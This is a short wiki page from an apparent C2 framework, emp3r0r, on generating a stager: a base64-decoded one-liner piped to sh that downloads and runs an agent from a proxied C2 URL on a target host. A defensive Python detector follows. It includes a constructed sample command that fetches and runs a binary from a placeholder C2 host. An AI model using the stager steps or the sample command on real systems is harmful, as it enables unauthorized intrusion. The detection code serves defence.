jm33-m0 edited this page Oct 22, 2024 · 3 revisions

Intro

A stager can be a shell command one-liner or a small piece of script code that can be easily executed on a target host. Once it runs, it downloads an (obfuscated) agent binary and starts it.

For Linux hosts, a common type of stager looks like this:

echo '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' | base64 -d | sh

How to Use It

  1. In the emp3r0r console, type use gen_agent to build your desired agent binary.

  2. Once the agent is generated, type use stager to enter the stager module. You will be prompted to select a type. Currently, I recommend using bash.

  3. Here are a few important notes:

    • The stager needs a URL to download the obfuscated agent binary, which is already being served on a random HTTP port.
    • You can create a URL, such as http://some_domain.com/some_path, that should reverse-proxy to http://c2_host:port. When this URL is requested, the agent binary will be returned.
  4. Run the generated shell command or other types of stager on the target host, and wait for the agent to call home.
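As an added defender-side example (not part of this page or of the emp3r0r project), the following Python classifies process command lines for the `echo '...' | base64 -d | sh` shape shown in the intro and decodes the embedded payload to look for the download-and-execute step described above. The sample command lines, the hostname c2.example.invalid and the payload contents are constructed for illustration.

```python
import base64
import re
from typing import Optional

# Constructed sample payloads (not real captures). The "stager" one mimics a
# download-then-run sequence; the benign one only echoes a string.
BENIGN_PAYLOAD = base64.b64encode(b"echo hello").decode()
STAGER_PAYLOAD = base64.b64encode(
    b"curl -fsSL http://c2.example.invalid/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a &"
).decode()

# Constructed process command lines as a log or EDR sensor might record them.
SAMPLE_CMDLINES = [
    f"echo '{STAGER_PAYLOAD}' | base64 -d | sh",     # decode piped into a shell, downloads + runs
    f"echo '{BENIGN_PAYLOAD}' | base64 -d | sh",     # same shape, harmless payload
    f"echo {BENIGN_PAYLOAD} | base64 -d",            # decode only, nothing executes it
    "base64 -d /tmp/file.b64 > /tmp/file.bin",       # decoding a file, no interpreter
    "ls -la /var/log",
]

DECODE_RE = re.compile(r"\bbase64\s+(-d|--decode)\b")
INTERP_RE = re.compile(r"\|\s*(sh|bash|zsh|dash|python3?|perl)\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
EXEC_RE = re.compile(r"chmod\s+\+x|\bnohup\b")


def decode_embedded_payload(cmdline: str) -> Optional[str]:
    """Return the first base64 blob in cmdline decoded as text, or None if absent/undecodable."""
    m = B64_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> str:
    """'stager' if base64 is decoded into an interpreter and the payload downloads and
    executes something; 'suspicious' if only the decode-into-interpreter shape is present;
    'clean' otherwise."""
    if not (DECODE_RE.search(cmdline) and INTERP_RE.search(cmdline)):
        return "clean"
    payload = decode_embedded_payload(cmdline) or ""
    if DOWNLOAD_RE.search(payload) and EXEC_RE.search(payload):
        return "stager"
    return "suspicious"


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(f"{classify(line):10s} {line[:60]}")
```

A real deployment would feed this from execve audit records or EDR process telemetry rather than a fixed list, and would treat the "suspicious" class as a triage queue rather than an alert on its own.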